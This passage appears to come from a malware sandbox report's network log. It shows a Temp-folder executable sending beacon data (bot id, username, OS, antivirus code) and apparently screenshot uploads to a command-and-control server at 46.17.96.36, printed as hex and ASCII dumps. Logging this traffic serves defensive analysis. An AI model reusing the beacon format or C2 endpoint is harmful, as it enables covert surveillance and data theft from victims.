                                        Data Ascii: ?s!9q9}vZ!VmR-%-za]OjZ}[\DknFAJ0kyq>dZv<\kccM5bHEPfLdcF#5k%u_b;`z^&vJ&kIj#!|{Wwr?L0'<cq
                                        Aug 29, 2021 22:28:19.043443918 CEST14248INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:28:19 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        21192.168.2.44975646.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:27:17.813080072 CEST3283OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                                        Content-Type: multipart/form-data; boundary=----6f2b8ec125833bffe61c308b0401688c
                                        Host: 46.17.96.36
                                        Content-Length: 107127
                                        Cache-Control: no-cache
                                        Aug 29, 2021 22:27:17.813298941 CEST3283OUTData Raw: 2d 2d 2d 2d 2d 2d 36 66 32 62 38 65 63 31 32 35 38 33 33 62 66 66 65 36 31 63 33 30 38 62 30 34 30 31 36 38 38 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                        Data Ascii: ------6f2b8ec125833bffe61c308b0401688cContent-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                        Aug 29, 2021 22:27:17.813594103 CEST3293OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                        Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                        Aug 29, 2021 22:27:17.813899994 CEST3296OUTData Raw: 28 a0 06 e3 14 94 fa 31 45 82 e3 29 71 ed 4e 2b 48 45 2b 0e e3 68 22 97 14 51 60 b8 dc 50 69 71 45 03 1b 8e 69 71 4b 45 20 b8 da 4c 53 b1 46 28 b0 c6 e2 8c 53 b1 49 4a c1 71 39 a3 9a 31 46 28 18 94 52 d1 cd 20 1a 68 c5 2d 14 0c 6d 14 ea 28 01 a6
                                        Data Ascii: (1E)qN+HE+h"Q`PiqEiqKE LSF(SIJq91F(R h-m(R(RJZ((,QN4X.%-sNBJ\QLJ)h4wSZu_*>*:0}7{S:r^#(psQ3\zyjf-N~ck
                                        Aug 29, 2021 22:27:17.846157074 CEST3307OUTData Raw: 14 4e 49 3f af e4 6b c5 3e 37 7f c9 47 97 fe bd 62 fe 55 ef 1a 0f 87 5f 4e b9 9b 52 d4 6e 7e d9 aa dc 0c 49 36 30 a8 bf dd 51 d8 7f 9e 2b c1 fe 36 ff 00 c9 47 9b fe bd a2 fe 55 cd cd 1e 68 c2 2e e9 2d ce 95 19 72 ca 72 56 6d ec 79 cd 2d 1c d1 cd
                                        Data Ascii: NI?k>7GbU_NRn~I60Q+6GUh.-rrVmy-j@QE{G`i.tt{>`o;g8k<)rQXTnA*A\so&?!l9+J')^?G*+?j:S7?tj?f
                                        Aug 29, 2021 22:27:17.846234083 CEST3321OUTData Raw: 9f 7e e3 de bd 0a cb c6 cc be 2f 6b 7b b9 91 b4 bb f4 47 b3 90 0c 04 c8 c0 cf e3 90 73 d0 8a f3 6f f8 47 35 cf fa 02 ea 3f f8 0a ff 00 e1 52 1d 0b c4 0d 02 42 da 3e a2 51 09 2a 0d ab f1 9e bd bd 85 7a f5 f0 f8 7a ce ed ad ad fd 7a 1e 3d 0c 46 22
                                        Data Ascii: ~/k{GsoG5?RB>Q*zzz=F"O{^U#ZxbATd0RGc_>)vz("<KNkKqvFvaqRiAQH((ZJ`R1@QE(((RE-((v)
                                        Aug 29, 2021 22:27:17.878633022 CEST3335OUTData Raw: db 47 8e 09 21 7b 57 b9 cb 36 65 79 23 75 7d bf 2b a6 fc 06 c1 c8 ce 46 18 8a ae ba db 9f 11 69 3a c9 b3 20 e9 c9 68 a2 1f 37 fd 67 90 aa 3e f6 38 dd b7 d0 e3 3d e9 c1 d6 be bd ff 00 0d 45 35 47 5b 7f 5b 17 f5 2d 06 da 0f 0a da 6a 96 73 4d 25 d6
                                        Data Ascii: G!{W6ey#u}+Fi: h7g>8=E5G[[-jsM%$ N+8@nf7muxuydTK<& L6G42E#K3jP{;GwR7`+,PPt*NOJ-KV-?3a:X2IM3
                                        Aug 29, 2021 22:27:17.878700972 CEST3340OUTData Raw: 56 1d 46 29 a0 8f 5a 0b 0f 5a 61 61 c6 9b 46 45 19 a5 74 00 69 28 26 90 9a 40 38 53 c5 30 1a 76 6a 93 13 40 7a d1 de 90 9a 33 9a 00 53 47 6a 05 14 08 51 4b 8a 07 34 13 8a a0 0a 5f 7a 40 68 cd 02 b0 f1 4b 4d 07 9a 75 32 42 90 d2 d0 69 80 83 a5 2e
                                        Data Ascii: VF)ZZaaFEti(&@8S0vj@z3SGjQK4_z@hKMu2Bi.(P1NP)uJdZ`(65DfNM>0R(Jh;u4pxBcRzEM"e4`GqC;S39,>L2,:4
                                        Aug 29, 2021 22:27:17.878817081 CEST3348OUTData Raw: 50 67 ce f8 cd 30 83 9e 6b e8 e5 f0 d6 88 07 fc 82 ed 7f ef 8a f3 3f 89 9a 7d 9d 95 cd 97 d9 2d a2 83 72 36 e1 18 c6 79 aa 85 5e 77 60 92 e5 3c 8e 93 14 99 a5 15 c6 7a 07 a6 fc 0d e3 c6 b7 bf f6 0e 7f fd 19 1d 7b ad f3 e2 df 1f de 60 3f af f4 af
                                        Data Ascii: Pg0k?}-r6y^w`<z{`?t}fA4;;;]> x!GVP)F{0T]Il;j|~)k%o1)qIJ+,)i3@4uR)<:s^Q_YH;x~^S
                                        Aug 29, 2021 22:27:17.879036903 CEST3369OUTData Raw: ff 00 0a eb c5 7e 5e 7c cf 9f 6e 3a e7 ca 38 a8 aa b9 92 5e 66 94 e5 ca db 3b 78 8d ff 00 8e ae 25 95 6e e6 b1 d0 23 72 91 88 4e d9 2e 48 ea 49 ec 3f cf 5a 98 78 0b c3 6c cc 96 93 4d 0d d2 7f cb 48 6e 89 91 4f af 7f e5 4e b1 f3 bf e1 56 47 fd 97
                                        Data Ascii: ~^|n:8^f;x%n#rN.HI?ZxlMHnONVG?'gwc9ktBg>c?s]49*rQv:9]H9+Gh+_SAJ\8%_oGZ(1ATY%oW/,98]?R,'{5
                                        Aug 29, 2021 22:27:17.879450083 CEST3372OUTData Raw: 00 60 d7 ff 00 d1 91 57 be 5e 1f f4 59 3f 0f e6 2b e7 df 82 37 50 5b 78 e6 75 9e 64 8d a7 b1 78 a2 0e d8 de fb e3 3b 47 a9 c0 3f 95 7b 67 8a 35 fd 3b c3 da 62 5d 6a 77 3f 67 82 49 84 41 b6 33 65 88 27 18 50 4f f0 9f ca be 6f 34 8c a5 88 e5 8a bb
                                        Data Ascii: `W^Y?+7P[xudx;G?{g5;b]jw?gIA3e'POo4h0*we&Zk:]}m:u=\|PpEXO^JW.%;KgLj>kf:uZ_Ylk&91?Zh)5]+Q\7Ap)_d2
                                        Aug 29, 2021 22:27:17.985697985 CEST3390INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:27:17 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        210192.168.2.44994946.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:28:19.021507025 CEST14247OUTPOST /k8FppT/index.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        Host: 46.17.96.36
                                        Content-Length: 82
                                        Cache-Control: no-cache
                                        Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                        Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
                                        Aug 29, 2021 22:28:19.098575115 CEST14248INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:28:19 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: 6<c><d>0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        211192.168.2.44995046.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:28:19.300780058 CEST14249OUTPOST /k8FppT/index.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        Host: 46.17.96.36
                                        Content-Length: 82
                                        Cache-Control: no-cache
                                        Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                        Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
                                        Aug 29, 2021 22:28:19.377648115 CEST14289INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:28:19 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: 6<c><d>0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        212192.168.2.44995146.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:28:19.324321032 CEST14249OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                                        Content-Type: multipart/form-data; boundary=----412e85b07ebc931c9305d6d7a5d96d3c
                                        Host: 46.17.96.36
                                        Content-Length: 107128
                                        Cache-Control: no-cache
                                        Aug 29, 2021 22:28:19.324440956 CEST14249OUTData Raw: 2d 2d 2d 2d 2d 2d 34 31 32 65 38 35 62 30 37 65 62 63 39 33 31 63 39 33 30 35 64 36 64 37 61 35 64 39 36 64 33 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                        Data Ascii: ------412e85b07ebc931c9305d6d7a5d96d3cContent-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                        Aug 29, 2021 22:28:19.324672937 CEST14259OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                        Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                        Aug 29, 2021 22:28:19.324805021 CEST14262OUTData Raw: 28 a0 06 e3 14 94 fa 31 45 82 e3 29 71 ed 4e 2b 48 45 2b 0e e3 68 22 97 14 51 60 b8 dc 50 69 71 45 03 1b 8e 69 71 4b 45 20 b8 da 4c 53 b1 46 28 b0 c6 e2 8c 53 b1 49 4a c1 71 39 a3 9a 31 46 28 18 94 52 d1 cd 20 1a 68 c5 2d 14 0c 6d 14 ea 28 01 a6
                                        Data Ascii: (1E)qN+HE+h"Q`PiqEiqKE LSF(SIJq91F(R h-m(R(RJZ((,QN4X.%-sNBJ\QLJ)h4wSZu_*>*:0}7{S:r^#(psQ3\zyjf-N~ck
                                        Aug 29, 2021 22:28:19.357394934 CEST14271OUTData Raw: 14 4e 49 3f af e4 6b c5 3e 37 7f c9 47 97 fe bd 62 fe 55 ef 1a 0f 87 5f 4e b9 9b 52 d4 6e 7e d9 aa dc 0c 49 36 30 a8 bf dd 51 d8 7f 9e 2b c1 fe 36 ff 00 c9 47 9b fe bd a2 fe 55 cd cd 1e 68 c2 2e e9 2d ce 95 19 72 ca 72 56 6d ec 79 cd 2d 1c d1 cd
                                        Data Ascii: NI?k>7GbU_NRn~I60Q+6GUh.-rrVmy-j@QE{G`i.tt{>`o;g8k<)rQXTnA*A\so&?!l9+J')^?G*+?j:S7?tj?f
                                        Aug 29, 2021 22:28:19.357454062 CEST14288OUTData Raw: 24 05 14 62 8c 52 18 62 83 4b 48 69 88 4a 28 a2 90 c4 34 52 d2 e2 80 1b 8a 29 d8 a4 a0 04 14 b4 86 96 80 12 96 93 bd 2f 6a 00 28 a2 8a 00 29 45 27 7a 5e d4 00 51 47 6a 05 31 0b 45 14 50 20 a2 96 8a 60 14 b4 52 53 10 51 45 2d 00 14 b4 51 40 0b 45
                                        Data Ascii: $bRbKHiJ(4R)/j()E'z^QGj1EP `RSQE-Q@E(QE--)(P)ZZJQS4Z(dKIKL)hRP)xQuU3N*%@ip34$S4iSdUA5.6Sbj}+"z*c4Z2c1J.=-.(p
                                        Aug 29, 2021 22:28:19.391252041 CEST14312OUTData Raw: db 47 8e 09 21 7b 57 b9 cb 36 65 79 23 75 7d bf 2b a6 fc 06 c1 c8 ce 46 18 8a ae ba db 9f 11 69 3a c9 b3 20 e9 c9 68 a2 1f 37 fd 67 90 aa 3e f6 38 dd b7 d0 e3 3d e9 c1 d6 be bd ff 00 0d 45 35 47 5b 7f 5b 17 f5 2d 06 da 0f 0a da 6a 96 73 4d 25 d6
                                        Data Ascii: G!{W6ey#u}+Fi: h7g>8=E5G[[-jsM%$ N+8@nf7muxuydTK<& L6G42E#K3jP{;GwR7`+,PPt*NOJ-KV-?3a:X2IM3
                                        Aug 29, 2021 22:28:19.391336918 CEST14325OUTData Raw: de af 27 b1 1f f1 3a b4 ff 00 ae cb fc e8 cb 9f fb 1b f9 9d 78 fd 31 bf 71 ea 3e 2b ff 00 90 84 7f f5 cc 57 3a c3 9e 2b a3 f1 59 c6 a1 1f fd 73 ae 70 9e 6a 30 7f c1 46 38 ff 00 e3 c8 6e 29 7a 51 45 75 9c 03 b3 4e 18 a6 01 4e 02 a5 96 87 8a 5c d3
                                        Data Ascii: ':x1q>+W:+Yspj0F8n)zQEuNN\E-"fi*Yhpf)f"ARbr*EJ)TSSrKIZ)F2ep`T3D; se\B^_yMEMJ=+EP)hZb"@iiE
                                        Aug 29, 2021 22:28:19.391488075 CEST14339OUTData Raw: 8b 23 4b 57 3f bb 91 1b e8 e0 d3 0e 93 27 a3 81 ea 56 98 10 9e d5 66 18 6e 38 d8 5d 7e 87 15 0d ce 3d 4a 8c 94 b6 45 53 a5 cd fc 3b 4f d4 e2 98 da 65 d0 ff 00 96 4c 7d c5 6f c1 0d e1 c6 66 63 ec 79 ad 6b 68 2e 4e 32 a8 df 55 ac 27 8b 94 0e da 58
                                        Data Ascii: #KW?'Vfn8]~=JES;OeL}ofcykh.N2U'XgS&3nk<=b}0`htvG'=$&MbS*:fk s4*eA~"5b)Y#sC$:Xl,|Ju6t?;5dUgO
                                        Aug 29, 2021 22:28:19.423722982 CEST14366OUTData Raw: 62 c0 80 01 e3 9e 38 ce 6d c2 5a b6 5a 53 8e 88 f5 2b 4f 8f f6 76 31 b4 76 7e 0b 86 dd 19 b7 b2 c3 78 10 16 f5 20 45 d7 81 f9 55 8f f8 68 c1 ff 00 42 af fe 54 3f fb 5d 79 14 5e 1b b8 b8 bb d3 61 b4 bc b3 b9 8f 50 b8 7b 78 67 42 ea 81 94 ae e2 db
                                        Data Ascii: b8mZZS+Ov1v~x EUhBT?]y^aP{xgB00l,nr#&L`&>RGk_:g#^O-d>f+yc8L.no?6OO1d&<"B\@9'q"\Sw
                                        Aug 29, 2021 22:28:19.423928976 CEST14381OUTData Raw: 92 80 17 34 b4 c3 4a 0d 01 61 d4 53 69 45 02 16 97 34 da 5a 00 5a 5a 41 45 52 10 b4 a6 92 93 34 00 77 a5 a4 a2 80 03 45 14 50 01 45 14 50 02 d1 49 45 00 3a 8a 4a 51 40 82 96 92 83 4c 05 a2 92 8c d0 21 68 a4 cd 14 00 b4 52 52 d0 02 d1 49 45 00 2f
                                        Data Ascii: 4JaSiE4ZZZAER4wEPEPIE:JQ@L!hRRIE/4RRL-(QIE0E AKM&hf.h(hKI)4;PI)iifXuwKIE4FhRfQKI)Bh:SZu114Zb4M3L-;Fni3E
                                        Aug 29, 2021 22:28:19.496769905 CEST14389INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:28:19 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        213192.168.2.44995246.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:28:19.556566954 CEST14390OUTPOST /k8FppT/index.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        Host: 46.17.96.36
                                        Content-Length: 82
                                        Cache-Control: no-cache
                                        Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                        Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
                                        Aug 29, 2021 22:28:19.633733988 CEST14390INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:28:19 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: 6<c><d>0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        214192.168.2.44995346.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:28:19.791806936 CEST14391OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                                        Content-Type: multipart/form-data; boundary=----412e85b07ebc931c9305d6d7a5d96d3c
                                        Host: 46.17.96.36
                                        Content-Length: 107128
                                        Cache-Control: no-cache
                                        Aug 29, 2021 22:28:19.791941881 CEST14391OUTData Raw: 2d 2d 2d 2d 2d 2d 34 31 32 65 38 35 62 30 37 65 62 63 39 33 31 63 39 33 30 35 64 36 64 37 61 35 64 39 36 64 33 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                        Data Ascii: ------412e85b07ebc931c9305d6d7a5d96d3cContent-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                        Aug 29, 2021 22:28:19.792138100 CEST14401OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                        Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                        Aug 29, 2021 22:28:19.792289019 CEST14404OUTData Raw: 28 a0 06 e3 14 94 fa 31 45 82 e3 29 71 ed 4e 2b 48 45 2b 0e e3 68 22 97 14 51 60 b8 dc 50 69 71 45 03 1b 8e 69 71 4b 45 20 b8 da 4c 53 b1 46 28 b0 c6 e2 8c 53 b1 49 4a c1 71 39 a3 9a 31 46 28 18 94 52 d1 cd 20 1a 68 c5 2d 14 0c 6d 14 ea 28 01 a6
                                        Data Ascii: (1E)qN+HE+h"Q`PiqEiqKE LSF(SIJq91F(R h-m(R(RJZ((,QN4X.%-sNBJ\QLJ)h4wSZu_*>*:0}7{S:r^#(psQ3\zyjf-N~ck
                                        Aug 29, 2021 22:28:19.825747013 CEST14409OUTData Raw: 14 4e 49 3f af e4 6b c5 3e 37 7f c9 47 97 fe bd 62 fe 55 ef 1a 0f 87 5f 4e b9 9b 52 d4 6e 7e d9 aa dc 0c 49 36 30 a8 bf dd 51 d8 7f 9e 2b c1 fe 36 ff 00 c9 47 9b fe bd a2 fe 55 cd cd 1e 68 c2 2e e9 2d ce 95 19 72 ca 72 56 6d ec 79 cd 2d 1c d1 cd
                                        Data Ascii: NI?k>7GbU_NRn~I60Q+6GUh.-rrVmy-j@QE{G`i.tt{>`o;g8k<)rQXTnA*A\so&?!l9+J')^?G*+?j:S7?tj?f
                                        Aug 29, 2021 22:28:19.825783968 CEST14412OUTData Raw: ba 35 bf 88 de d6 e3 7c 45 70 f3 c4 b7 53 79 90 27 f7 5b 23 71 5f e2 0b 81 d3 0d 24 13 e8 cb e3 9f 08 c7 71 a7 6a 32 5f 79 1a 58 13 47 7c 89 10 3b 23 c6 63 30 93 c7 71 bf 9f 6a f3 61 0c 7e 94 a2 14 03 00 70 69 c6 8c 93 bd fa df f3 ff 00 30 9d 65
                                        Data Ascii: 5|EpSy'[#q_$qj2_yXG|;#c0qja~pi0e+hwxv+u0\?U?]Lo.<N|Wr6D$?m9A8q/A=*VVbMobiGFb)|lJ(EQ!EPIKI@QQbQ@
                                        Aug 29, 2021 22:28:19.826024055 CEST14415OUTData Raw: 24 05 14 62 8c 52 18 62 83 4b 48 69 88 4a 28 a2 90 c4 34 52 d2 e2 80 1b 8a 29 d8 a4 a0 04 14 b4 86 96 80 12 96 93 bd 2f 6a 00 28 a2 8a 00 29 45 27 7a 5e d4 00 51 47 6a 05 31 0b 45 14 50 20 a2 96 8a 60 14 b4 52 53 10 51 45 2d 00 14 b4 51 40 0b 45
                                        Data Ascii: $bRbKHiJ(4R)/j()E'z^QGj1EP `RSQE-Q@E(QE--)(P)ZZJQS4Z(dKIKL)hRP)xQuU3N*%@ip34$S4iSdUA5.6Sbj}+"z*c4Z2c1J.=-.(p
                                        Aug 29, 2021 22:28:19.826119900 CEST14424OUTData Raw: 9f 7e e3 de bd 0a cb c6 cc be 2f 6b 7b b9 91 b4 bb f4 47 b3 90 0c 04 c8 c0 cf e3 90 73 d0 8a f3 6f f8 47 35 cf fa 02 ea 3f f8 0a ff 00 e1 52 1d 0b c4 0d 02 42 da 3e a2 51 09 2a 0d ab f1 9e bd bd 85 7a f5 f0 f8 7a ce ed ad ad fd 7a 1e 3d 0c 46 22
                                        Data Ascii: ~/k{GsoG5?RB>Q*zzz=F"O{^U#ZxbATd0RGc_>)vz("<KNkKqvFvaqRiAQH((ZJ`R1@QE(((RE-((v)
                                        Aug 29, 2021 22:28:19.826158047 CEST14427OUTData Raw: f4 b5 ad fd 75 3d b2 d3 5b b7 d7 e1 f0 fd f4 18 05 af 19 64 8f 39 28 e2 de 6c 8f f3 da bc 5b e3 3f fc 94 39 bf eb da 2f e5 5d 27 80 ee 58 f8 d6 ce 18 8b 25 b4 92 49 27 95 9c 80 44 52 01 f9 06 23 35 cd fc 65 ff 00 92 87 37 fd 7b c5 ff 00 a0 d7 95
                                        Data Ascii: u=[d9(l[?9/]'X%I'DR#5e7{ZP[[gBs{GRKE%;oij}p&kN^.MH/<[B"<c/ci7qZ[S,*{{{KO^gr.ry/(A}+!76
                                        Aug 29, 2021 22:28:19.826435089 CEST14429OUTData Raw: c9 6e 8e 78 21 1e b4 a1 71 5b de 5d b3 75 41 49 f6 3b 56 f6 a3 d8 8f eb 2b aa 30 f1 4e 03 35 b2 74 d8 8f dd 62 29 87 4a 3d 9c 7e 22 8f 64 d0 7d 62 06 5e da 70 15 7c e9 92 8e 98 35 1b 58 cc bc ed a3 91 87 b5 8b ea 56 c5 2e 2a 53 6e e3 aa 9a 6f 96
                                        Data Ascii: nx!q[]uAI;V+0N5tb)J=~"d}b^p|5XV.*SnoGo(OhNT7O)UCe*ANO3+<]S<y^G^]*chT)Fc)K|]j}(BK,K\S&Kp+b1Eq1Y
                                        Aug 29, 2021 22:28:19.859574080 CEST14432OUTData Raw: db 47 8e 09 21 7b 57 b9 cb 36 65 79 23 75 7d bf 2b a6 fc 06 c1 c8 ce 46 18 8a ae ba db 9f 11 69 3a c9 b3 20 e9 c9 68 a2 1f 37 fd 67 90 aa 3e f6 38 dd b7 d0 e3 3d e9 c1 d6 be bd ff 00 0d 45 35 47 5b 7f 5b 17 f5 2d 06 da 0f 0a da 6a 96 73 4d 25 d6
                                        Data Ascii: G!{W6ey#u}+Fi: h7g>8=E5G[[-jsM%$ N+8@nf7muxuydTK<& L6G42E#K3jP{;GwR7`+,PPt*NOJ-KV-?3a:X2IM3
                                        Aug 29, 2021 22:28:19.965218067 CEST14500INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:28:19 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        215192.168.2.44995446.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:28:19.858357906 CEST14430OUTPOST /k8FppT/index.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        Host: 46.17.96.36
                                        Content-Length: 82
                                        Cache-Control: no-cache
                                        Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                        Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
                                        Aug 29, 2021 22:28:19.938060045 CEST14499INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:28:19 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: 6<c><d>0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        216192.168.2.44995546.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:28:20.192167997 CEST14501OUTPOST /k8FppT/index.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        Host: 46.17.96.36
                                        Content-Length: 82
                                        Cache-Control: no-cache
                                        Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                        Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
                                        Aug 29, 2021 22:28:20.271400928 CEST14501INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
